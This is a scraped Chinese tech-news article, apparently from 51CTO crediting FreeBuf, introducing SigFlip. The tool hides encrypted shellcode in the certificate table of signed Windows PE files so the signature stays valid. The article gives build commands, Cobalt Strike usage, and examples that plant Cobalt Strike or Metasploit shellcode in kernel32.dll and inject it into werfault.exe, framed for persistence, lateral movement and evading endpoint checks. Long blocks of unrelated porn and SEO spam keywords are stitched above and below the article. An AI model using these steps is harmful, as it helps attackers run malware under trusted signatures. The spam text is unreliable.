国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

如何使用SigFlip篡改身份認證碼簽名的PE文件

安全 數據安全
SigFlip是一款能夠篡改經過身份認證碼簽名的PE文件(exe、dll、sys等)的工具,而且整個過程不會影響或破壞已有的身份認證碼簽名。

[[426526]]

關于SigFlip

SigFlip是一款能夠篡改經過身份認證碼簽名的PE文件(exe、dll、sys等)的工具,而且整個過程不會影響或破壞已有的身份認證碼簽名。換句話來說,就是我們可以使用SigFlip向PE文件中嵌入數據(比如Shellcode),并且再不會破壞文件簽名、完整性檢查或PE文件功能的情況下,修改PE文件的校驗和或哈希。

SigInject組件可以將Shellcode注入至PE文件的[WIN_CERTIFICATE]證書表中,并輸出加密密鑰以便配合BOF/C/C#加載器(SigLoader)一起使用。SigInject將保存針對PE文件的修改操作,并保證其簽名和證書有效性不變。

SigLoader是一個基礎加載器,它采用SigInject創建的修改后的PE文件路徑和解密密鑰作為參數,然后提取和解密嵌入的Shellcode,以供選擇Shellcode注入使用。

SigFlip將檢查PE哈希是否已成功更改,然后退出以繞過終端針對此類行為的檢查。

SigFlip可以用于持久化感染、橫向滲透以及命令/代碼執行等場景。

注意事項:igFlip、SigInject和SigLoader將以BOF腳本和.NET程序集提供。

工具安裝

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/med0x2e/SigFlip.git 

工具構建/編譯

本項目并沒有提供預編譯的BOF,我們可以使用Mingw-w64來進行編譯。如果是.NET,可以使用VS或csc.exe來編譯.NET項目(SigFlip、SigLoader);如果是BOF,請按照下列步驟操作:

  1. ➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
  2.  
  3. ➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
  4.  
  5. ➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
  6.  
  7. ➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o 

確保所有的對象文件都存儲在sigflip.cna的相同目錄下,然后在Cobalt Strike中加載sigflip.cna。

注意事項:預編譯的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能會出現崩潰的情況。

Cobalt Strike

執行程序集:

  1. execute-assembly SigFlip.exe -h 
  2.  
  3. execute-assembly SigLoader -h 

BOF:

當我們在Cobalt Strike中加載sigflip.cna了之后,將會注冊兩個新命令,我們此時就能夠以下列方式使用SigFlip和SigInject了。

  • SigFlip:在不破壞簽名或證書有效性的情況下,修改PE文件哈希:
    1. SigFlip "<PE\_FILE\_PATH>" "<OUTPUT\_PE\_FILE\_PATH (with extension)>
  • SigInject:向PE文件的[WIN_CERTIFICATE]證書表中注入加密的Shellcode,打印的加密密鑰可以跟基礎C/C#加載器結合使用以保證簽名和證書的完整性:
    1. SigInject "<PE\_FILE\_PATH> <OUTPUT\_PE\_FILE\_PATH (with extension)>" "<SHELLCODE\_FILE>
  • SigLoader:從PE文件中加載由SigInject加密的Shellcode,然后使用Early Bird向指定進程注入Shellcode,我們可以自定義Shellcode的注入邏輯,或直接替換目標代碼:
    1. SigLoader <PE_FILE_PATH_WITH_SH> <DECRYPTION_KEY> <SPAWNTO_PROCESS_PATH> <PARENT_PROCESS_ID> 

工具使用樣例

(1) BOF

向msbuild.exe注入隨機數據:

  1. SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe" 

向kernel32.ell注入Shellcode:

  1. SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
  2.  
  3. Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300 

(2) 執行程序集

向msbuild.exe注入隨機數據:

  1. execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe 

向kernel32.ell注入Shellcode:

  1. execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
  2.  
  3. execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354 

項目地址

SigFlip:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2022-07-26 23:45:29

Windows系統蘋果

2022-01-17 09:00:00

漏洞網絡安全身份認證

2021-06-03 09:33:23

PDF漏洞黑客

2023-07-03 08:25:54

2012-11-28 09:55:35

2021-05-11 19:58:01

身份驗證Code

2011-07-28 14:45:07

無線POS機系統

2010-09-03 09:19:13

PPP身份認證

2018-07-05 14:52:05

2011-03-30 13:21:17

2014-04-22 10:15:38

vCenter SSO身份認證

2016-05-17 13:54:05

2022-02-13 22:42:52

設計模式策略

2013-06-18 19:23:16

身份認證管理身份認證管理系統身份認證

2013-06-19 09:46:57

身份認證管理云應用

2010-10-08 21:14:08

2023-12-25 08:04:42

2013-11-15 09:43:02

2010-09-06 14:03:06

PPP身份認證
點贊
收藏

51CTO技術棧公眾號

久久久久久久国产| 91桃色在线| 777a∨成人精品桃花网| 妞干网免费在线视频| 欧美一区二区三区四区在线| 日韩在线播放一区二区| wwwwww99| 亚洲国内精品在线| 99久久久久| 亚洲爆乳无码专区| 在线播放亚洲一区| 少妇精品导航| 免费的av在线| 欧美性xxxxxx少妇| 给我免费播放日韩视频| 天天久久人人| 精品久久久久久久久久国产| 开心久久婷婷综合中文字幕| 久久大香伊蕉在人线观看热2| 国产精品国产三级国产aⅴ入口 | 国产成人免费视频网站高清观看视频| julia中文字幕久久亚洲蜜臀| 亚洲人av在线影院| 黄色成人在线网站| 国产va在线| 综合欧美国产视频二区| 日本欧美在线看| 黄色电影免费在线看| 欧美在线视频播放| 久久久精品天堂| 国产精品一区二区av影院萌芽| 成人动漫在线观看视频 | 手机在线免费观看av| 成人激情综合网| 久久精品夜色噜噜亚洲a∨| 日本黄色免费在线| 欧美日韩一区在线视频| 在线观看免费成人| 日韩一区二区在线| 超清福利视频| 色综合色综合久久综合频道88| 国产精品一二一区| 888av在线视频| 欧美一区2区三区4区公司二百| 色综合久久综合网欧美综合网| 久久99视频| 99热.com| 97国产suv精品一区二区62| 久久久一区二区| 亚洲综合伊人| 动漫av网站免费观看| 在线观看国产精品淫| 国产一区二区精品久久99| av色综合久久天堂av色综合在| 国产精品一区二区免费看| 欧美日韩国产精品一区二区不卡中文| 亚洲欧美日本伦理| 无限国产资源| 国产精品专区一| 亚洲国产一区二区视频| 欧美中文一区二区| 真不卡电影网| 成人免费在线视频网站| 日本韩国精品一区二区在线观看| 欧美一区影院| av在线播放免费| 欧美xxxx黑人又粗又长精品| 日韩你懂的在线播放| 狠狠网亚洲精品| 成人做爰免费视频免费看| 国产av麻豆mag剧集| 色妞一区二区三区| 国产欧美日本一区二区三区| 欧美黄色影院| 神马电影在线观看| 欧美大香线蕉线伊人久久| 亚洲高清一区二| 成人app下载| 精品午夜视频| 国产日本韩国在线播放| 亚洲一区精品电影| 欧美一卡在线观看| 国产老女人精品毛片久久| 久久久久久爱| 亚洲社区在线| 六十路精品视频| 亚洲美腿欧美激情另类| 成人免费毛片a| 久久国产生活片100| 综合久久2019| 中文字幕一区二区中文字幕| 亚洲精品久久在线| 99视频一区二区| 欧洲大片精品免费永久看nba| jizz大全欧美jizzcom| 国产精品成熟老女人| 色欧美日韩亚洲| 日韩成人一区二区| 国产综合av| 九色成人在线| 动漫一区二区在线| 日韩国产精品视频| 日本一区二区免费在线观看视频 | 日韩中文字幕av在线| 亚洲国产成人久久综合| 成人av网在线| 欧美性感美女一区二区| 国内精品久久久久久野外| 成人在线国产视频| 国产99久久精品一区二区| 91久久精品日日躁夜夜躁欧美| 久久国内精品视频| 国产成人一二| 在线日本视频| 国产乱子伦农村叉叉叉| 91九色国产社区在线观看| 亚洲国产精品中文| 亚洲天天做日日做天天谢日日欢| 一区二区三区国产在线| 四虎精品在线观看| 韩日视频在线| 91九色在线观看视频| 国产高清精品一区二区| www.亚洲天堂| 精品视频1区2区3区| 久久伊人中文字幕| 一本一本久久| 奇米777国产一区国产二区| www免费在线观看| a优女a优女片| 亚洲色图都市激情| 91精品国产99久久久久久红楼| 日韩资源在线观看| 欧美日韩黄视频| 国产精品久久久久7777按摩| 免费成人在线观看视频| 毛片在线看网站| 久久高清视频免费| 疯狂做受xxxx高潮欧美日本| 美女精品一区二区| 欧洲三级视频| 日韩精品一区二区三区av| 未来日记在线观看| 成人免费观看cn| 国产尤物99| 38少妇精品导航| 亚洲精品中文字幕女同| 精品av在线播放| bt7086福利一区国产| 中文亚洲字幕| 亚洲国产最新| 91在线成人| 羞羞网站在线免费观看| 蜜桃视频中文字幕| 欧美又粗又长又爽做受| 精品久久精品久久| 日韩美女视频免费看| 在线精品高清中文字幕| 欧美日韩国产成人在线91| 成人免费在线视频| 国产一区二区不卡老阿姨| 欧美深夜福利| 国产精品羞羞答答在线观看| 羞羞影院欧美| 99热国产在线中文| 最新亚洲人成网站在线观看| 欧美精品一区二区三区免费播放| 青青成人在线| 999精品视频一区二区三区| 韩国欧美亚洲国产| 尤物yw午夜国产精品视频明星| 欧美人动与zoxxxx乱| 亚洲精品综合在线| 成人一级片网址| 麻豆91精品| 国内精品嫩模av私拍在线观看| 群体交乱之放荡娇妻一区二区| 中文日产幕无线码一区二区| 久久久久久久久免费视频| 尤物网站在线| www.国产精| 久久黄色免费看| 日本xxxxxxxxxx75| 国产日韩视频在线播放| 日韩av电影免费播放| 99久久99久久精品国产片| 国产精品69久久| 久久免费精品视频| 久久夜色精品国产欧美乱| 中国china体内裑精亚洲片| 日韩av网站导航| 精品国产青草久久久久福利| 欧美一区二区在线免费观看| 91高清视频免费看| 欧美在线观看禁18| 岛国视频午夜一区免费在线观看| 国产精品久久久久四虎| 国产精品对白交换视频| 1区2区3区精品视频| 亚洲精品成人悠悠色影视|